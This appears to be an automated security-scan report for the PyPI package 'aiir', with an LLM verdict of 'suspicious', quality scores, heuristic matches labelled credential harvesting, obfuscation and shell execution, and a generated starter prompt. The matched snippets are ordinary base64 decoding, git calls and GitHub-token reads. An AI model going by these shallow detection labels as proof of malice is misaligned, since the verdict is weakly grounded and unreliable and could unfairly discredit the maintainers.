aiir

v1.6.0 suspicious
4.0
Medium Risk

AI Integrity Receipts — cryptographic receipts for commits with declared AI involvement

🤖 AI Analysis

Final verdict: SUSPICIOUS

The package has minimal network risks but shows signs of incomplete metadata and potential shell misuse, raising concerns about its integrity and the maintainers' activity level.

  • Incomplete author information
  • Potential misuse of shell commands
Per-check LLM notes
  • Network: No network calls detected.
  • Shell: Git commands are likely used for version control purposes but could indicate unexpected behavior if not documented.
  • Metadata: The author information is incomplete and the maintainer seems to be new or inactive, which raises some suspicion but not enough to conclude malice.

📦 Package Quality Overall: Medium (6.0/10)

◈ Medium Test Suite 6.0

Partial test coverage signals detected

  • Test runner config found: pyproject.toml
◈ Medium Documentation 7.0

Some documentation present

  • Documentation URL: "Documentation" -> https://github.com/invariant-systems-ai/aiir/blob/main/docs/
  • Detailed PyPI description (36425 chars)
○ Low Contributing Guide 4.0

No contributing guide or governance files found

  • Development Status classifier >= Beta
◈ Medium Type Annotations 7.0

Partial type annotation coverage

  • Classifier: Typing :: Typed
  • 273 type-annotated function signatures detected in source
◈ Medium Multiple Contributors 6.0

Limited contributor diversity

  • 2 unique contributor(s) across 100 commits in invariant-systems-ai/aiir
  • Two distinct contributors found

🔬 Heuristic Checks

Outbound Network Calls

No suspicious network call patterns found

Code Obfuscation score 10.0

Found 6 obfuscation pattern(s)

  • b.sha256( base64.b64decode(certificate_raw, validate=True) ).hexdigest(
  • = json.loads( base64.b64decode(canonicalized_body, validate=True).decode("utf-8")
  • lse: try: base64.b64decode(body_b64, validate=True) except (ValueError, TypeErr
  • hash"), "body_bytes": base64.b64decode(str(document["body_b64"]), validate=True), "log_inde
  • try: body_bytes = base64.b64decode(canonicalized_body, validate=True) except (TypeError, Va
  • try: raw = base64.b64decode(encoded, validate=True) except (TypeError, ValueErro
Shell / Subprocess Execution score 6.0

Found 3 shell execution pattern(s)

  • or os.getcwd()) result = subprocess.run( ["git", "--no-optional-locks"] + args, cwd=
  • nto the diff hash. proc = subprocess.Popen( [ "git", "--no-optional-loc
  • try: result = subprocess.run( ["git", "--no-optional-locks", "hash-object
Credential Harvesting score 10.0

Found 4 credential access pattern(s)

  • """ auth_token = token or os.environ.get("GITHUB_TOKEN", "") if not auth_token: raise RuntimeError("No
  • """ auth_token = token or os.environ.get("GITHUB_TOKEN", "") if not auth_token: return None api_u
  • write permission) if os.environ.get("GITHUB_TOKEN"): try: create_check_run(receip
  • write permission) if os.environ.get("GITHUB_TOKEN"): try: post_pr_comment(receipt
Typosquatting

No typosquatting candidates detected

Registered Email Domain

Email domain looks legitimate: invariantsystems.io>

Suspicious Page Links

All external links appear legitimate

Git Repository History

Repository invariant-systems-ai/aiir appears legitimate

Maintainer History score 4.0

2 maintainer concern(s) found

  • Author name is missing or very short
  • Author "" appears to have only 1 package on PyPI (new or inactive account)
Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.

💡 AI App Starter Prompt

Use this prompt to build a project with aiir 
Develop a version control integrity checker application named 'AICommitGuardian' using Python and the 'aiir' package. This tool will help developers ensure that their codebase remains trustworthy by generating cryptographic receipts for commits where AI tools were involved in the development process. Here’s a step-by-step guide on how to build this application:

1. **Project Setup**: Start by setting up your Python environment. Ensure you have Git installed and properly configured. Install the 'aiir' package via pip.
2. **Application Structure**: Design the basic structure of your application. It should include modules for handling Git operations, interfacing with the 'aiir' package, and displaying results.
3. **Git Integration**: Implement functionality to connect to a local or remote Git repository. Allow users to select which repository they want to monitor.
4. **Commit Analysis**: Develop a feature that scans through commit history to identify commits where AI tools were used. Use the 'aiir' package to generate cryptographic receipts for these commits.
5. **Integrity Verification**: Create a system within the application to verify the integrity of commits based on the generated cryptographic receipts. Users should be able to check if any commit has been tampered with since the receipt was issued.
6. **User Interface**: Design a simple yet effective command-line interface (CLI) or graphical user interface (GUI) for interacting with the application. Ensure it provides clear feedback and error messages.
7. **Reporting**: Include a reporting feature that compiles a summary of all verified commits and any anomalies detected during the integrity verification process.
8. **Testing and Documentation**: Thoroughly test the application to ensure it works as expected. Write comprehensive documentation detailing how to install, configure, and use the application effectively.

The 'aiir' package plays a crucial role in this application by providing the necessary functions to create and validate cryptographic receipts for commits involving AI. This ensures that developers can trust the authenticity and integrity of their codebase, especially when leveraging AI tools in their development workflow.